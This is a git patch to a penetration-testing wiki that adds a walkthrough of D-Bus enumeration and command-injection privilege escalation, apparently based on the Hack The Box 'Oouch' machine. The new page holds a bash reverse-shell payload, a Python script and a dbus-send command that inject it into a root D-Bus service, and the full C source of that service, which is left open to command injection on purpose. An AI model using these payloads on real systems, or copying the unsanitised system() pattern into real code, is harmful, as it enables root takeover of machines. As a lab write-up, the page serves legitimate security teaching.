From cb1c3ad7dfdf5b38999ea801a70c9be695e540af Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Fri, 7 Aug 2020 00:26:17 +0000
Subject: [PATCH] GitBook: [master] 359 pages modified

---
 SUMMARY.md                                    |   1 +
 linux-unix/privilege-escalation/README.md     |   8 +-
 ...-command-injection-privilege-escalation.md | 398 ++++++++++++++++++
 3 files changed, 405 insertions(+), 2 deletions(-)
 create mode 100644 linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md

diff --git a/SUMMARY.md b/SUMMARY.md
index f47eb3ced..68917b1ac 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -19,6 +19,7 @@
 
 * [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
 * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
+  * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
   * [Interesting Groups - Linux PE](linux-unix/privilege-escalation/interesting-groups-linux-pe.md)
   * [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
   * [lxc - Privilege escalation](linux-unix/privilege-escalation/lxd-privilege-escalation.md)
diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md
index 5ce460136..753736e86 100644
--- a/linux-unix/privilege-escalation/README.md
+++ b/linux-unix/privilege-escalation/README.md
@@ -195,7 +195,7 @@ If the socket **respond with a HTTP** request, then you can **communicate** with
 
 ## **D-Bus**
 
-D-BUS is an **interprocess communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system.
+D-BUS is an **inter-process communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system.
 
 D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. ****\(From [here](https://www.linuxjournal.com/article/7744)\).
 
@@ -203,7 +203,7 @@ D-Bus use an **allow/deny model**, where each message \(method call, signal emis
 
 Part of the policy of `/etc/dbus-1/system.d/wpa_supplicant.conf`:
 
-```bash
+```markup
 <policy user="root">
     <allow own="fi.w1.wpa_supplicant1"/>
     <allow send_destination="fi.w1.wpa_supplicant1"/>
@@ -217,6 +217,10 @@ Therefore, if a policy is allowing your user in anyway to **interact with the bu
 Note that a **policy** that **doesn't specify** any user or group affects everyone \(`<policy>`\).  
 Policies to the context "default" affects everyone not affected by other policies \(`<policy context="default"`\).
 
+**Learn how to enumerate and exploit a D-Bus communication here:**
+
+{% page-ref page="d-bus-enumeration-and-command-injection-privilege-escalation.md" %}
+
 ## Processes
 
 Take a look to what processes are being executed and check if any process has more privileges that it should \(maybe a tomcat being executed by root?\)
diff --git a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
new file mode 100644
index 000000000..4720328c3
--- /dev/null
+++ b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
@@ -0,0 +1,398 @@
+# D-Bus Enumeration & Command Injection Privilege Escalation
+
+**The examples of this page are based on the Oouch box from HTB.**
+
+## **Enumeration**
+
+### List Service Objects
+
+It's possible to list opened D-Bus interfaces with:
+
+```bash
+busctl list #List D-Bus interfaces
+
+NAME                                   PID PROCESS         USER             CONNECTION    UNIT                      SE
+:1.0                                     1 systemd         root             :1.0          init.scope                - 
+:1.1345                              12817 busctl          qtc              :1.1345       session-729.scope         72
+:1.2                                  1576 systemd-timesyn systemd-timesync :1.2          systemd-timesyncd.service - 
+:1.3                                  2609 dbus-server     root             :1.3          dbus-server.service       - 
+:1.4                                  2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    - 
+:1.6                                  2612 systemd-logind  root             :1.6          systemd-logind.service    - 
+:1.8                                  3087 unattended-upgr root             :1.8          unattended-upgrades.serv… - 
+:1.820                                6583 systemd         qtc              :1.820        user@1000.service         - 
+com.ubuntu.SoftwareProperties            - -               -                (activatable) -                         - 
+fi.epitest.hostap.WPASupplicant       2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    - 
+fi.w1.wpa_supplicant1                 2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    - 
+htb.oouch.Block                       2609 dbus-server     root             :1.3          dbus-server.service       - 
+org.bluez                                - -               -                (activatable) -                         - 
+org.freedesktop.DBus                     1 systemd         root             -             init.scope                - 
+org.freedesktop.PackageKit               - -               -                (activatable) -                         - 
+org.freedesktop.PolicyKit1               - -               -                (activatable) -                         - 
+org.freedesktop.hostname1                - -               -                (activatable) -                         - 
+org.freedesktop.locale1                  - -               -                (activatable) -                         - 
+```
+
+### Service Object Info
+
+Then, you can obtain some information about the interface with:
+
+```bash
+busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface
+
+PID=2609
+PPID=1
+TTY=n/a
+UID=0
+EUID=0
+SUID=0
+FSUID=0
+GID=0
+EGID=0
+SGID=0
+FSGID=0
+SupplementaryGIDs=
+Comm=dbus-server
+CommandLine=/root/dbus-server
+Label=unconfined
+CGroup=/system.slice/dbus-server.service
+Unit=dbus-server.service
+Slice=system.slice
+UserUnit=n/a
+UserSlice=n/a
+Session=n/a
+AuditLoginUID=n/a
+AuditSessionID=n/a
+UniqueName=:1.3
+EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search 
+        cap_fowner cap_fsetid cap_kill cap_setgid 
+        cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service 
+        cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock 
+        cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot 
+        cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot 
+        cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config 
+        cap_mknod cap_lease cap_audit_write cap_audit_control 
+        cap_setfcap cap_mac_override cap_mac_admin cap_syslog 
+        cap_wake_alarm cap_block_suspend cap_audit_read
+PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search 
+        cap_fowner cap_fsetid cap_kill cap_setgid 
+        cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service 
+        cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock 
+        cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot 
+        cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot 
+        cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config 
+        cap_mknod cap_lease cap_audit_write cap_audit_control 
+        cap_setfcap cap_mac_override cap_mac_admin cap_syslog 
+        cap_wake_alarm cap_block_suspend cap_audit_read
+InheritableCapabilities=
+BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search 
+        cap_fowner cap_fsetid cap_kill cap_setgid 
+        cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service 
+        cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock 
+        cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot 
+        cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot 
+        cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config 
+        cap_mknod cap_lease cap_audit_write cap_audit_control 
+        cap_setfcap cap_mac_override cap_mac_admin cap_syslog 
+        cap_wake_alarm cap_block_suspend cap_audit_read
+```
+
+### List Interfaces of a Service Object
+
+You need to have enough permissions.
+
+```bash
+busctl tree htb.oouch.Block #Get Interfaces of the service object
+
+└─/htb
+  └─/htb/oouch
+    └─/htb/oouch/Block
+```
+
+### Introspect Interface of a Service Object
+
+Note how in this example it was selected the latest interface discovered using the `tree` parameter \(_see previous section_\):
+
+```bash
+busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface
+
+NAME                                TYPE      SIGNATURE RESULT/VALUE FLAGS
+htb.oouch.Block                     interface -         -            -
+.Block                              method    s         s            -
+org.freedesktop.DBus.Introspectable interface -         -            -
+.Introspect                         method    -         s            -
+org.freedesktop.DBus.Peer           interface -         -            -
+.GetMachineId                       method    -         s            -
+.Ping                               method    -         -            -
+org.freedesktop.DBus.Properties     interface -         -            -
+.Get                                method    ss        v            -
+.GetAll                             method    s         a{sv}        -
+.Set                                method    ssv       -            -
+.PropertiesChanged                  signal    sa{sv}as  -            -
+```
+
+Note the method `.Block` of the interface `htb.oouch.Block` \(the one we are interested in\). The "s" of the other columns may mean that it's expecting a string.
+
+### Monitor/Capture Interface
+
+With enough privileges \(just `send_destination` and `receive_sender` privileges aren't enough\) you can monitor a D-Bus communication. In the following example the interface `htb.oouch.Block` is monitored and **the message "**_**lalalalal**_**" is sent through miscommunication**:
+
+```bash
+busctl monitor htb.oouch.Block
+
+Monitoring bus message stream.
+‣ Type=method_call  Endian=l  Flags=0  Version=1  Priority=0 Cookie=2
+  Sender=:1.1376  Destination=htb.oouch.Block  Path=/htb/oouch/Block  Interface=htb.oouch.Block  Member=Block
+  UniqueName=:1.1376
+  MESSAGE "s" {
+          STRING "lalalalal";
+  };
+
+‣ Type=method_return  Endian=l  Flags=1  Version=1  Priority=0 Cookie=16  ReplyCookie=2
+  Sender=:1.3  Destination=:1.1376
+  UniqueName=:1.3
+  MESSAGE "s" {
+          STRING "Carried out :D";
+  };
+```
+
+You can use `capture` instead of `monitor` to save the results in a pcap file.
+
+### More
+
+`busctl` have even more options, [**find all of them here**](https://www.freedesktop.org/software/systemd/man/busctl.html).
+
+## **Vulnerable Scenario**
+
+As user **qtc inside the host "oouch"** you can find an **unexpected D-Bus config file** located in _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->
+
+<!DOCTYPE busconfig PUBLIC
+ "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
+ "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
+
+<busconfig>
+
+    <policy user="root">
+        <allow own="htb.oouch.Block"/>
+    </policy>
+
+	<policy user="www-data">
+		<allow send_destination="htb.oouch.Block"/>
+		<allow receive_sender="htb.oouch.Block"/>
+	</policy>
+
+</busconfig>
+```
+
+Note from the previous configuration that **you will need to be the user `root` or `www-data` to send and receive information** via this D-BUS communication.
+
+As user **qtc** inside the docker container **aeb4525789d8** you can find some dbus related code in the file _/code/oouch/routes.py._ This is the interesting code:
+
+```python
+if primitive_xss.search(form.textfield.data):
+            bus = dbus.SystemBus()
+            block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
+            block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
+
+            client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr)  
+            response = block_iface.Block(client_ip)
+            bus.close()
+            return render_template('hacker.html', title='Hacker')
+```
+
+As you can see, it is **connecting to a D-Bus interface** and sending to the **"Block" function** the "client\_ip".
+
+In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening** in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address.  
+**The call to `system` is vulnerable on purpose to command injection**, so a payload like the following one will create a reverse shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
+
+### Exploit it
+
+At the end of this page you can find the **complete C code of the D-Bus application**. Inside of it you can find between the lines 91-97 **how the** _**D-Bus object path**_ **and** _**interface name**_ **are registered**. This information will be necessary to send information to the D-Bus connection:
+
+```c
+        /* Install the object */
+        r = sd_bus_add_object_vtable(bus,
+                                     &slot,
+                                     "/htb/oouch/Block",  /* interface */
+                                     "htb.oouch.Block",   /* service object */
+                                     block_vtable,
+                                     NULL);
+```
+
+Also, in line 57 you can find that **the only method registered** for this D-Bus communication is called `Block`\(_**Thats why in the following section the payloads are going to be sent to the service object `htb.oouch.Block`, the interface `/htb/oouch/Block` and the method name `Block`**_\):
+
+```c
+SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
+```
+
+#### Python
+
+The following python code will send the payload to the D-Bus connection to the `Block` method via `block_iface.Block(runme)` \(_note that it was extracted from the previous chunk of code_\):
+
+```python
+import dbus
+bus = dbus.SystemBus()
+block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
+block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
+runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #"
+response = block_iface.Block(runme)
+bus.close()
+```
+
+#### busctl and dbus-send
+
+```bash
+dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
+```
+
+* `dbus-send` is a tool used to send message to “Message Bus”
+* Message Bus – A software used by systems to make communications between applications easily. It’s related to Message Queue \(messages are ordered in sequence\) but in Message Bus the messages are sending in a subscription model and also very quick.
+* “-system” tag is used to mention that it is a system message, not a session message \(by default\).
+* “–print-reply” tag is used to print our message appropriately and receives any replies in a human-readable format.
+* “–dest=Dbus-Interface-Block” The address of the Dbus interface.
+* “–string:” – Type of message we like to send to the interface. There are several formats of sending messages like double, bytes, booleans, int, objpath. Out of this, the “object path” is useful when we want to send a path of a file to the Dbus interface. We can use a special file \(FIFO\) in this case to pass a command to interface in the name of a file. “string:;” – This is to call the object path again where we place of FIFO reverse shell file/command.
+
+_Note that in `htb.oouch.Block.Block`, the first part \(`htb.oouch.Block`\) references the service object and the last part \(`.Block`\) references the method name._
+
+### C code 
+
+```c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <systemd/sd-bus.h>
+
+static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) {
+        char* host = NULL;
+        int r;
+
+        /* Read the parameters */
+        r = sd_bus_message_read(m, "s", &host);
+        if (r < 0) {
+                fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r));
+                return r;
+        }
+
+        char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP";
+
+        int command_len = strlen(command);
+        int host_len = strlen(host);
+
+        char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char));
+        if(command_buffer == NULL) {
+                fprintf(stderr, "Failed to allocate memory\n");
+                return -1;
+        }
+
+        sprintf(command_buffer, command, host);
+
+        /* In the first implementation, we simply ran command using system(), since the expected DBus
+         * to be threading automatically. However, DBus does not thread and the application will hang 
+         * forever if some user spawns a shell. Thefore we need to fork (easier than implementing real
+         * multithreading)
+         */
+        int pid = fork();
+
+        if ( pid == 0 ) {
+            /* Here we are in the child process. We execute the command and eventually exit. */
+            system(command_buffer);
+            exit(0);
+        } else {
+            /* Here we are in the parent process or an error occured. We simply send a genric message. 
+             * In the first implementation we returned separate error messages for success or failure.
+             * However, now we cannot wait for results of the system call. Therefore we simply return
+             * a generic. */
+            return sd_bus_reply_method_return(m, "s", "Carried out :D");
+        }
+        r = system(command_buffer);
+}
+
+
+/* The vtable of our little object, implements the net.poettering.Calculator interface */
+static const sd_bus_vtable block_vtable[] = {
+        SD_BUS_VTABLE_START(0),
+        SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
+        SD_BUS_VTABLE_END
+};
+
+
+int main(int argc, char *argv[]) {
+        /*
+         * Main method, registeres the htb.oouch.Block service on the system dbus.
+         *
+         * Paramaters:
+         *      argc            (int)             Number of arguments, not required
+         *      argv[]          (char**)          Argument array, not required
+         *
+         * Returns:
+         *      Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive
+         *      as long as the user keeps it alive.
+         */
+
+
+        /* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */
+        signal(SIGCHLD,SIG_IGN);
+
+        sd_bus_slot *slot = NULL;
+        sd_bus *bus = NULL;
+        int r;
+
+        /* First we need to connect to the system bus. */
+        r = sd_bus_open_system(&bus);
+        if (r < 0) 
+        {
+                fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r));
+                goto finish;
+        }
+
+        /* Install the object */
+        r = sd_bus_add_object_vtable(bus,
+                                     &slot,
+                                     "/htb/oouch/Block",  /* interface */
+                                     "htb.oouch.Block",   /* service object */
+                                     block_vtable,
+                                     NULL);
+        if (r < 0) {
+                fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r));
+                goto finish;
+        }
+
+        /* Register the service name to find out object */
+        r = sd_bus_request_name(bus, "htb.oouch.Block", 0);
+        if (r < 0) {
+                fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r));
+                goto finish;
+        }
+
+        /* Infinite loop to process the client requests */
+        for (;;) {
+                /* Process requests */
+                r = sd_bus_process(bus, NULL);
+                if (r < 0) {
+                        fprintf(stderr, "Failed to process bus: %s\n", strerror(-r));
+                        goto finish;
+                }
+                if (r > 0) /* we processed a request, try to process another one, right-away */
+                        continue;
+
+                /* Wait for the next request to process */
+                r = sd_bus_wait(bus, (uint64_t) -1);
+                if (r < 0) {
+                        fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r));
+                        goto finish;
+                }
+        }
+
+finish:
+        sd_bus_slot_unref(slot);
+        sd_bus_unref(bus);
+
+        return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
+}
+
+```
+